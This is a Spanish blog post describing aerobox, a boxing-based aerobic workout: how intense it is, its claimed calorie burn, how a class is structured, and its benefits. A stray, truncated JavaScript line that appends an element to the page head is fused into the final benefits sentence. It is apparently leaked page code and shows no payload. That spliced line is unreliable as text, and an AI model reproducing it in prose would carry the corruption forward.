Salud y belleza » Deportes

¿Qué es el aerobox?

Sin Comentarios

El aerobox es una alternativa aeróbica basada, como su nombre lo indica, en el entrenamiento de los boxeadores (pero sin la confrontación directa, claro). Con el aerobox se ofrece una alternativa más fuerte e intensa que el denominado aerobic tradicional. Es una práctica ideal para aquellas personas interesadas en ganar fuerza y masa muscular en un corto plazo.

Vale mencionar que se trata de un ejercicio sumamente agotador, no recomendado para personas enfermas o poco acostumbradas a éste tipo de desgaste: una sola clase de aerobox puede llegar a provocar el consumo de entre quinientas y setecientas calorías.

¿Cómo se desarrolla una clase regular de aerobox? Bien, la misma comienza con un calentamiento de diez minutos iniciales (lapso de acondicionamiento), continúa con una fase de trabajo físico que dura casi media hora (ejercicios tanto de piernas como de brazos a través de repeticiones de alta intensidad; trabajo de casi todos los grupos musculares) y finaliza con el clásico estiramiento (diez minutos finales, tiempo para la relajación).

Entre los beneficios del aerobox se destacan: aumento de fuerza, resistencia y elasticidad; mejoramiento de la explosividad muscular y el tiempo de reacción a los estímulos; incremento del riego sanguíneo y fortalecimiento del corazón.d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.